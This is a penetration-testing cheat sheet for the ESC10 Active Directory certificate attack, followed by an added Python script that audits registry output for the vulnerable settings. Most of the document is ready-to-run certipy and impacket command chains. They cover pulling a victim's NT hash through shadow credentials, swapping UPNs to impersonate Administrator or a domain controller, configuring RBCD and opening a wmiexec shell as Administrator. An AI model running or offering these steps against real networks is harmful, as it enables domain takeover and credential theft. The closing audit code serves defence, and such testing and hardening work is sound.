ESC10
Case 1
Reviewing registry keys as Administrator
bob$ python3 reg.py minions.com/'Administrator':'<pass>'@<IP_address> query -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\Kdc'
If the query returns StrongCertificateBindingEnforcement REG_DWORD 0x0, we can proceed.
Retrieve the victim's NT Hash
bob$ certipy shadow auto -u <user> -p <pass> -account <victim>
Change the UPN of <victim> to Administrator
bob$ certipy account update -u <user> -p <pass> -user <victim> -upn administrator@minions.com
Request certificate
bob$ certipy req -u <user> -hashes <hash> -ca <ca_name> -template <template_name>
Revert the UPN of <victim> (to be sure that only Administrator matches the certificate)
bob$ certipy account update -u <user> -p <pass> -user <victim> -upn <victim>@minions.com
Authenticate as the Administrator
bob$ certipy auth -pfx administrator.pfx -domain minions.com
Case 2
Using reg.py to query registry from Linux
bob$ python3 reg.py minions.com/Administrator:'<pass>'@<IP_address> query -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL'
Update the UPN of <victim> to match the DC machine account name
bob$ certipy account update -u '<user>' -p '<pass>' -user <victim> -upn '<dc_machine_name>$@minions.com'
Request a certificate as <victim> to obtain the domain controller certificate
bob$ certipy req -u <victim>@minions.com -hashes <hash_value> -ca <ca_name> -template <template_name>
Revert changes of <victim> (to be sure that only Administrator matches the certificate)
bob$ certipy account update -u '<user>' -p '<pass>' -user <victim> -upn '<victim>$@minions.com'
Create a new computer account and configure RBCD from the LDAP shell
bob$ certipy auth -pfx <dc_machine_name>.pfx -domain minions.com -dc-ip <dc_ip_address> -ldap-shell
# add_computer <new_account_name> <new_account_pass>
# set_rbcd <dc_machine_name>$ <new_account_name>$
Abusing RBCD to Impersonate the Administrator
bob$ impacket-getST -spn cifs/<dc_machine_name>$@minions.com -impersonate Administrator -dc-ip <dc_ip_address> minions.com/'<new_account_name>$':<new_account_pass>
Connect using the Administrator TGT
bob$ export KRB5CCNAME=Administrator.ccache
bob$ impacket-wmiexec -k -no-pass <dc_machine_name>.minions.com
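As an added example (not part of these notes), a small Python audit that takes the output of the two reg.py queries above and flags the settings that leave a domain exposed to ESC10: StrongCertificateBindingEnforcement set to 0 under the Kdc key (Case 1), and a CertificateMappingMethods value under the SCHANNEL key with the UPN bit 0x4 set (Case 2; the notes only query the key, the value name is the standard Schannel one). The sample output is constructed, and the tab-separated line layout of reg.py output is an assumption.

```python
import re

# Constructed sample of reg.py output for the two keys queried in the notes.
KDC_OUTPUT = """\
HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc
\tStrongCertificateBindingEnforcement\tREG_DWORD\t 0x0
"""
SCHANNEL_OUTPUT = """\
HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL
\tCertificateMappingMethods\tREG_DWORD\t 0x1f
\tEventLogging\tREG_DWORD\t 0x1
"""

UPN_MAPPING_BIT = 0x4  # CertificateMappingMethods flag that enables UPN mapping

# One REG_DWORD line: name, type, hex or decimal value (tab or space separated, assumed).
VALUE_RE = re.compile(r"^\s*(\w+)\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$")


def parse_dwords(output):
    """Return {value_name: int} for every REG_DWORD line in reg.py query output."""
    values = {}
    for line in output.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values[m.group(1)] = int(m.group(2), 0)
    return values


def audit_esc10(kdc_output, schannel_output):
    """Return a list of findings; an empty list means neither ESC10 case applies."""
    findings = []
    sce = parse_dwords(kdc_output).get("StrongCertificateBindingEnforcement")
    # Case 1: 0 disables strong mapping, so the KDC accepts a certificate matched by UPN alone.
    if sce == 0:
        findings.append("Case 1: StrongCertificateBindingEnforcement=0 (set it to 2 for full enforcement)")
    elif sce is None:
        findings.append("Case 1: StrongCertificateBindingEnforcement not set; verify the effective default")
    cmm = parse_dwords(schannel_output).get("CertificateMappingMethods")
    # Case 2: the UPN bit lets Schannel map a certificate to an account by UPN alone.
    if cmm is not None and cmm & UPN_MAPPING_BIT:
        findings.append(f"Case 2: CertificateMappingMethods=0x{cmm:x} has UPN bit 0x4 set (clear it)")
    return findings


if __name__ == "__main__":
    for finding in audit_esc10(KDC_OUTPUT, SCHANNEL_OUTPUT) or ["no ESC10 preconditions found"]:
        print(finding)
```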